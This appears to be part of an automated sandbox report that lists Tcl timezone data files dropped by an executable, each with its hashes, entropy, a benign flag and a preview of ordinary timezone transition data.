                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):611
                                                                                                                                                                                                                              Entropy (8bit):4.303621439025158
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290znTjmdHOYCvprv5EU/dLAyW+/uF+kX8/uF+RZ//dAWcP/QAWcx/uF+rbE:5GnPeOdvhxD1pLS+S8S+RVqzo4xS+3SJ
                                                                                                                                                                                                                              MD5:FB09D1F064C30F9E223FA119A8875098
                                                                                                                                                                                                                              SHA1:C66173FEB21761AEA649301D77FBB77ACF3A6FB1
                                                                                                                                                                                                                              SHA-256:F0F0CCE8DE92D848A62B56EF48E01D763B80153C077230C435D464CF1733BA38
                                                                                                                                                                                                                              SHA-512:BC3D841FF48FD0DE7C9ABF5DAE3A42C876BD4D7FBD6684B4513EC7ECC92D938A7133BCC873AD46E453DD1863E843E5C7DD14FFDB41B593E90BEB5CD8F7E66202
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Managua) {.. {-9223372036854775808 -20708 0 LMT}.. {-2524500892 -20712 0 MMT}.. {-1121105688 -21600 0 CST}.. {105084000 -18000 0 EST}.. {161758800 -21600 0 CST}.. {290584800 -18000 1 CDT}.. {299134800 -21600 0 CST}.. {322034400 -18000 1 CDT}.. {330584400 -21600 0 CST}.. {694260000 -18000 0 EST}.. {717310800 -21600 0 CST}.. {725868000 -18000 0 EST}.. {852094800 -21600 0 CST}.. {1113112800 -18000 1 CDT}.. {1128229200 -21600 0 CST}.. {1146384000 -18000 1 CDT}.. {1159682400 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1166
                                                                                                                                                                                                                              Entropy (8bit):3.7842934576858482
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5GnqeKwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQz:5mSeSFESoSQSrSsCSeSPS1cSQSQlSsSQ
                                                                                                                                                                                                                              MD5:E42719A9B0165490BB9E0E899EFB3643
                                                                                                                                                                                                                              SHA1:2991D7EC31F47E32D2C8DB89A0F87D814122DD1B
                                                                                                                                                                                                                              SHA-256:DC54E6D4FE14458B0462FA0E15B960FD4290930ADC0D13453BF49B436ED8C143
                                                                                                                                                                                                                              SHA-512:F75024E27A2D679A667EA70EC948F983C7B823FDA5962DD88697D61147A6C2B1499E58BA8B01170653C4D025900491AE8E21925500DE39EACBAF883F7E62D874
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Manaus) {.. {-9223372036854775808 -14404 0 LMT}.. {-1767211196 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.900738604616686
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zzJ/90ppv:MByMYbpwt290zzN90b
                                                                                                                                                                                                                              MD5:8C60DE8E522FE5D51EACD643FD8EA132
                                                                                                                                                                                                                              SHA1:2E09A71DF340ECA6F7AEBD978070D56A627049EC
                                                                                                                                                                                                                              SHA-256:5C26D7CE93F91CC4F5ED87E9388B1B180EF9D84681044FD23CC01A628A1284CA
                                                                                                                                                                                                                              SHA-512:D2D522D041AFA638542F6FF00F5F40325E3F117C5035BA71F676B4956B054542C67A753055D17E2E2EEA925F13EACC0969D01EC18E40D274D8EA408F92777EA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Marigot) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):251
                                                                                                                                                                                                                              Entropy (8bit):4.849143012086458
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290zlEDm2OHfueoHv9dMIqR5lRfT/VVFUFkmR/lAov:MB86290zimdHfnCv9dMIqR5lVb/uFkmD
                                                                                                                                                                                                                              MD5:CFE10EE56115D3A5F44E047B3661D8ED
                                                                                                                                                                                                                              SHA1:03F598CFC9AEDE2F588339B439B2361F2EBDE34F
                                                                                                                                                                                                                              SHA-256:D411FB42798E93B106275EC0E054F8F3C4E9FB49431C656448739C7F20C46EDE
                                                                                                                                                                                                                              SHA-512:25D6760FDF2F1B0DD91A41D29BDB7048FAE27A03F7B9D9C955ECF4C32E8402836D007B39FE62B93E7BEA017681A0C8AFC1C4CAFD823B0A6C41EDAF09DDF3435D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Martinique) {.. {-9223372036854775808 -14660 0 LMT}.. {-2524506940 -14660 0 FFMT}.. {-1851537340 -14400 0 AST}.. {323841600 -10800 1 ADT}.. {338958000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6745
                                                                                                                                                                                                                              Entropy (8bit):3.8432520851585372
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aD5NA604qSScBgN+4ctDzIVQ/c/3hNxTh:aDbA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:FC4A24AE95BA6E36285F09AB2FCEE56F
                                                                                                                                                                                                                              SHA1:54ED1CD69247064B5EC775E907790D19E93A4626
                                                                                                                                                                                                                              SHA-256:59C658CEA1BF5392A8F16295A09A74230EFB52EF7BF783E493E9A9C1799036F2
                                                                                                                                                                                                                              SHA-512:2E8E65C487090DC8EE90F8575360A00E74C134CE34E83D4296E2CC32B773F9F0151F4049BFD1BEEAFE7B441E8684AF9FB50287E42FBD5182E4051D1FC39932E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Matamoros) {.. {-9223372036854775808 -23400 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2067
                                                                                                                                                                                                                              Entropy (8bit):3.990817847620547
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5GtXed9WUQwuz/V/NF01YmM/parZ375+XiB+:5sNUIdFS1YrpaV5+yB+
                                                                                                                                                                                                                              MD5:43467194416FCF6F0D67AD2456D78646
                                                                                                                                                                                                                              SHA1:1FDF02EF7354D9DB71F545D32AE52D018E99D801
                                                                                                                                                                                                                              SHA-256:8140084EA9D6A478C34A114D9E216DC05450ECBE4809B2CDA194B40452E2AA0F
                                                                                                                                                                                                                              SHA-512:EB5CD3E95779391F096EE9A7B16920C6C9E8A90F38C7A3CBE2B0E123D088A127C5BBE21F5883DCDAD4FBB2410ED052EDE3D4F1E260483D97FEBB7BA7022874C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mazatlan) {.. {-9223372036854775808 -25540 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -2520
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.812188311941308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MeHAIgp/MSvYovN/290zpH+90/MX:MByMY/M/p/MSA6t290zpe90/MX
                                                                                                                                                                                                                              MD5:2A3BFEEFBB684FB3B420A6B53B588BDC
                                                                                                                                                                                                                              SHA1:CC5C0BB90D847CCBB45688A8DA460AD575D64617
                                                                                                                                                                                                                              SHA-256:D6B308A1619F2DE450DACBFEF0E11B237DF7375A80C90899DD02B827688CB4B8
                                                                                                                                                                                                                              SHA-512:4A35C80D3454E039383FFEB06DC84933B3201BE2487C42A448AF3DA5ABAEEB9882263C011CDD3194E121EC1C31FC80120BF7829F280A79996E376CFA828EE215
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Mendoza)]} {.. LoadTimeZoneFile America/Argentina/Mendoza..}..set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8410
                                                                                                                                                                                                                              Entropy (8bit):3.8311875423131534
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6quShLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:6lSUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:C74D31382279219F805D2B138C58FBF7
                                                                                                                                                                                                                              SHA1:06E2FED0A3BDF62F3D390A4054B6A2D7C1863DD3
                                                                                                                                                                                                                              SHA-256:B0863F8B66F0848020651B69E7997307D62209259AE653FDC1A0FAFC8E793068
                                                                                                                                                                                                                              SHA-512:7B42CBDC119651E2B2EE8B8F934801D3147A8B72EE060A0D0EA1C0C12CA9ABD03F1A102A85BF8E7424B45620151CE107D16A9173F4AA7597EDB3109840C1B2AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Menominee) {.. {-9223372036854775808 -21027 0 LMT}.. {-2659759773 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-116438400 -18000 1 CDT}.. {-100112400 -21600 0 CST}.. {-21484800 -18000 0 EST}.. {104914800 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200 -18000 1 CDT}.. {278492400 -21600 0 CST}.. {294220800 -18000 1 CDT}.. {309942000 -2160
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1877
                                                                                                                                                                                                                              Entropy (8bit):3.9636871490767147
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5bu36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:1qehpYtj
                                                                                                                                                                                                                              MD5:34909341A29FF048D83B707D12A728A5
                                                                                                                                                                                                                              SHA1:A4D4EC31681DB5F9DA899E20C6789D10827E6D86
                                                                                                                                                                                                                              SHA-256:ADE65ADDEEA027D1BE70DC7C12513B61FDF36289021E66982D527C7FEE2A2D19
                                                                                                                                                                                                                              SHA-512:57EED40425680CE2C05D961D3F21EE2E0D204E1FD6D3DB5F1EF7AC349AA269F9397D4E2121BD13BC3DE34205564FBE009CEEB5ADE4052EA742CBA15A91F5822B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Merida) {.. {-9223372036854775808 -21508 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {407653200 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6705
                                                                                                                                                                                                                              Entropy (8bit):3.985641709481311
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4DCG0haiaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:42G0IiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:4999FE49C1640402CB432BC1EB667479
                                                                                                                                                                                                                              SHA1:2ED0044927A66856090793ED6E5FF634617C8C40
                                                                                                                                                                                                                              SHA-256:2574831391092AD44D7B2806EEF30D59CE3BAE872111917DD39EC51EFDD62E5F
                                                                                                                                                                                                                              SHA-512:39DE1D24037F3FFA3101BBAA885939074E596479F68013CDA9CE53A061EA704F63FB55C15B68B66B0E29E3F07ADC0BDC2D78A2D289277E75D2EF95F54988DB74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Metlakatla) {.. {-9223372036854775808 54822 0 LMT}.. {-3225223727 -31578 0 LMT}.. {-2188955622 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2261
                                                                                                                                                                                                                              Entropy (8bit):3.9546083289866267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5CBUBUI+n36fELf5On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:EB7qehpYtj
                                                                                                                                                                                                                              MD5:7A67EA7FF5AC0E9B088298007A9370F4
                                                                                                                                                                                                                              SHA1:531583F67E0C6ABA95B5A664A555BF40BF743CE8
                                                                                                                                                                                                                              SHA-256:E83DB749E6AA87FD56829C2810D0F93A4194E3EE2CB0BDC12114B1EF55E92E96
                                                                                                                                                                                                                              SHA-512:2C9035B415E36A769782FCFA15D79E5FEACA232439D1442407C8CD8C144EE9991030D9D58D2AD54CF6C0840BF78C81921B82BECBC74ABBD0DAC627F77772F52F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mexico_City) {.. {-9223372036854775808 -23796 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-975261600 -18000 1 CDT}.. {-963169200 -21600 0 CST}.. {-917114400 -18000 1 CDT}.. {-907354800 -21600 0 CST}.. {-821901600 -18000 1 CWT}.. {-810068400 -21600 0 CST}.. {-627501600 -18000 1 CDT}.. {-612990000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001836800 -21600 0 CST}.. {1014184800 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {10357020
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7080
                                                                                                                                                                                                                              Entropy (8bit):3.5379714312244217
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:2UViR+iORv7bw1aW5AnMyxH5e+fHbxMfOp6D7bF8qMmqyiqV1mjZe7JhlgXY7FWN:02l5qJZS
                                                                                                                                                                                                                              MD5:C68889AA813C399939FCFA54E9CE0DFB
                                                                                                                                                                                                                              SHA1:F3D58D7BEFF2D1CB94FECE00C31FEF5BDF58C231
                                                                                                                                                                                                                              SHA-256:1B131AC968F95652667BD7EB1F6D667C8F679B31270D82B4B4271E787386CCCA
                                                                                                                                                                                                                              SHA-512:EBAF8210919E34668E9DDFCB546E5A62F35954957AAE956B6302BF296C7D4CF51E1B10FB13217CB3EEB430DAC246217EB4E9250CB4109C95D8A4367457D02771
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Miquelon) {.. {-9223372036854775808 -13480 0 LMT}.. {-1850328920 -14400 0 AST}.. {326001600 -10800 0 -03}.. {536468400 -10800 0 -02}.. {544597200 -7200 1 -02}.. {562132800 -10800 0 -02}.. {576046800 -7200 1 -02}.. {594187200 -10800 0 -02}.. {607496400 -7200 1 -02}.. {625636800 -10800 0 -02}.. {638946000 -7200 1 -02}.. {657086400 -10800 0 -02}.. {671000400 -7200 1 -02}.. {688536000 -10800 0 -02}.. {702450000 -7200 1 -02}.. {719985600 -10800 0 -02}.. {733899600 -7200 1 -02}.. {752040000 -10800 0 -02}.. {765349200 -7200 1 -02}.. {783489600 -10800 0 -02}.. {796798800 -7200 1 -02}.. {814939200 -10800 0 -02}.. {828853200 -7200 1 -02}.. {846388800 -10800 0 -02}.. {860302800 -7200 1 -02}.. {877838400 -10800 0 -02}.. {891752400 -7200 1 -02}.. {909288000 -10800 0 -02}.. {923202000 -7200 1 -02}.. {941342400 -10800 0 -02}.. {954651600 -7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10507
                                                                                                                                                                                                                              Entropy (8bit):3.8204583916930557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:X9+FPHyXFRsivcQYM+T7Z/xVQzxmtBWIXrObx29x8sLxcGMe++wzlrfFjxKvnpNM:gF6L0d0F2TzNc/1cYUH+CC
                                                                                                                                                                                                                              MD5:80B88F57B837CD2478815796618A6AC6
                                                                                                                                                                                                                              SHA1:CC2BE0213E9F0D3B307A8311D7A1013582E8A338
                                                                                                                                                                                                                              SHA-256:D977D045DE5CDAEB41189B91963E03EF845CA4B45E496649B4CB541EE1B5DD22
                                                                                                                                                                                                                              SHA-512:9410CBD706CAABFFF88DFF75235597D844B45A061EBD796F6708D7CEAB680273571A17935B7CCFC7C466ABF293C286D0886F47880E692F74C4E8BFB41729C73C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Moncton) {.. {-9223372036854775808 -15548 0 LMT}.. {-2715882052 -18000 0 EST}.. {-2131642800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1167595200 -14400 0 AST}.. {-1153681200 -10800 1 ADT}.. {-1145822400 -14400 0 AST}.. {-1122231600 -10800 1 ADT}.. {-1114372800 -14400 0 AST}.. {-1090782000 -10800 1 ADT}.. {-1082923200 -14400 0 AST}.. {-1059332400 -10800 1 ADT}.. {-1051473600 -14400 0 AST}.. {-1027882800 -10800 1 ADT}.. {-1020024000 -14400 0 AST}.. {-996433200 -10800 1 ADT}.. {-988574400 -14400 0 AST}.. {-965674800 -10800 1 ADT}.. {-955396800 -14400 0 AST}.. {-934743600 -10800 1 ADT}.. {-923947200 -14400 0 AST}.. {-904503600 -10800 1 ADT}.. {-891892800 -14400 0 AST}.. {-883598400 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1940
                                                                                                                                                                                                                              Entropy (8bit):3.9628147491173964
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5JZKy36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:XwDqehpYtj
                                                                                                                                                                                                                              MD5:4AE2B33D9DACE0E582FA456B361C50B7
                                                                                                                                                                                                                              SHA1:5D62287F072F3687EF130BB1A9DD97BB2ABCF91C
                                                                                                                                                                                                                              SHA-256:F5A66A403BF40BE7EAB188F3CEC8D7DB700F60084F7B856AB87E0AA4A0F2C0B6
                                                                                                                                                                                                                              SHA-512:39BE803FD47709A1120FC8E09DB9B294DE41F69C7DD86AAB03AD8D0878B160B21D82B16398125559B792DAE99D5D917AE466C536001FEC1E618B68ACA9A80322
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Monterrey) {.. {-9223372036854775808 -24076 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2936
                                                                                                                                                                                                                              Entropy (8bit):3.6410670126139046
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5JgQkS4SaEcSyS0sZSUS2kSVSXSulSASX5kAXJMsCXrUari3akaWCa3M+lafpI6L:X5kH4c9GT0E01jm5keJMRXrUEi3akaWO
                                                                                                                                                                                                                              MD5:D78DEBC7C0B15B31635DDC34C49248BC
